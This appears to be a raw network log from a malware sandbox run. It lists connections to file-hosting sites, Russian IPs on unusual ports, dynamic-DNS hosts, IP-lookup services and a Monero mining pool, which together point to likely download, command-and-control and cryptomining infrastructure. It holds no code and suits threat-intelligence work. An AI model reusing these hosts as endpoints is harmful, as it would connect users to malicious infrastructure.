US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.172.128.35:443 185.172.128.35 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 35.128.172.185.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.pdian.link udp
US 8.8.8.8:53 4.0.41.198.in-addr.arpa udp
US 8.8.8.8:53 www.lookatlan.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.gdyanjiu.icu udp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
IN 4.224.60.120:28410 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 120.60.224.4.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.antsnav.com udp
US 188.114.96.0:80 www.antsnav.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 www.antsnav.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 188.114.97.0:443 yip.su tcp
US 104.20.68.143:443 pastebin.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 194.49.94.47:80 194.49.94.47 tcp
US 8.8.8.8:53 gobo25cl.top udp
US 8.8.8.8:53 flyawayaero.net udp
US 172.67.197.19:80 gobo25cl.top tcp
US 8.8.8.8:53 redirector.pm udp
US 172.67.197.19:443 gobo25cl.top tcp
US 172.67.216.81:443 flyawayaero.net tcp
US 8.8.8.8:53 rawcracker.com udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 194.49.94.85:443 redirector.pm tcp
US 8.8.8.8:53 potatogoose.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.180.173:443 potatogoose.com tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 188.114.97.9:443 rawcracker.com tcp
US 188.114.96.0:80 yip.su tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 bobkelsofan.com udp
BG 91.92.243.139:80 91.92.243.139 tcp
US 104.21.27.119:443 bobkelsofan.com tcp
US 8.8.8.8:53 check.graspalace.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 iplogger.com udp
US 188.114.97.0:80 check.graspalace.com tcp
US 104.21.12.138:443 iplogger.com tcp
US 8.8.8.8:53 47.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 19.197.67.172.in-addr.arpa udp
US 8.8.8.8:53 81.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 85.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 173.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 9.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 139.243.92.91.in-addr.arpa udp
US 8.8.8.8:53 119.27.21.104.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 www.gdyanjiu.icu udp
US 8.8.8.8:53 138.12.21.104.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 check.graspalace.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 check.graspalace.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 173.231.16.77:80 api.ipify.org tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 19.216.145.82.in-addr.arpa udp
BG 91.92.254.7:80 91.92.254.7 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 tomwallner.icu udp
RU 185.185.69.247:80 tomwallner.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.irmaosconstrusilva.store udp
US 8.8.8.8:53 247.69.185.185.in-addr.arpa udp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
US 104.21.12.138:443 iplogger.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.94:443 features.opera-api2.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 82.145.216.23:443 download.opera.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 94.182.26.185.in-addr.arpa udp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 download3.operacdn.com udp
NL 2.19.194.91:443 download3.operacdn.com tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 91.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 www.gdyanjiu.icu udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 34.120.175.65:80 www.333vvs.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 34.120.175.65:80 www.333vvs.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 34.120.175.65:80 www.333vvs.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 34.120.175.65:80 www.333vvs.com tcp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 8.8.8.8:53 www.a0zu3im002.cfd udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 adrianofata.icu udp
US 34.120.175.65:80 www.333vvs.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
DE 195.201.255.35:443 tcp
US 194.49.94.152:50500 tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.pdian.link udp
DE 195.201.255.35:443 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.stericyclehq.com udp
US 63.141.242.46:80 www.stericyclehq.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
US 8.8.8.8:53 46.242.141.63.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 63.141.242.46:80 www.stericyclehq.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 188.114.96.0:80 check.graspalace.com tcp
US 63.141.242.46:80 www.stericyclehq.com tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 188.114.96.0:80 check.graspalace.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
US 63.141.242.46:80 www.stericyclehq.com tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 check.graspalace.com tcp
US 63.141.242.46:80 www.stericyclehq.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 check.graspalace.com tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.172.128.100:80 185.172.128.100 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 185.185.69.247:80 adrianofata.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 check.graspalace.com tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 www.ljwixsb.top udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.irmaosconstrusilva.store udp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
US 8.8.8.8:53 www.gdyanjiu.icu udp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients79.google.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datalake.abuse.ch udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
KR 38.6.193.13:80 pz.qishia.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients79.google.com udp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.gdyanjiu.icu udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 gservicese.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.a0zu3im002.cfd udp
RU 193.37.71.22:80 193.37.71.22 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
IT 81.17.18.197:80 www.stericyclehq.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 197.18.17.81.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
IT 81.17.18.197:80 www.stericyclehq.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
IT 81.17.18.197:80 www.stericyclehq.com tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
IT 81.17.18.197:80 www.stericyclehq.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 xmr-asia1.nanopool.org udp
SG 139.99.102.74:10343 xmr-asia1.nanopool.org tcp
CA 108.181.20.37:443 files.catbox.moe tcp
IT 81.17.18.197:80 www.stericyclehq.com tcp
US 8.8.8.8:53 74.102.99.139.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 www.ljwixsb.top udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.ljwixsb.top udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.mobdigim.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 88.80.147.105:53 ewixgdb.ua udp
BG 185.141.63.253:80 ewixgdb.ua tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.finebb.net udp
US 8.8.8.8:53 105.147.80.88.in-addr.arpa udp
US 8.8.8.8:53 253.63.141.185.in-addr.arpa udp
US 8.8.8.8:53 4.63.141.185.in-addr.arpa udp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
RU 91.194.2.86:80 www.finebb.net tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.yf168vip.com udp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.248.169.48:80 www.shortfall.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.shortfall.net udp
US 13.248.169.48:80 www.shortfall.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
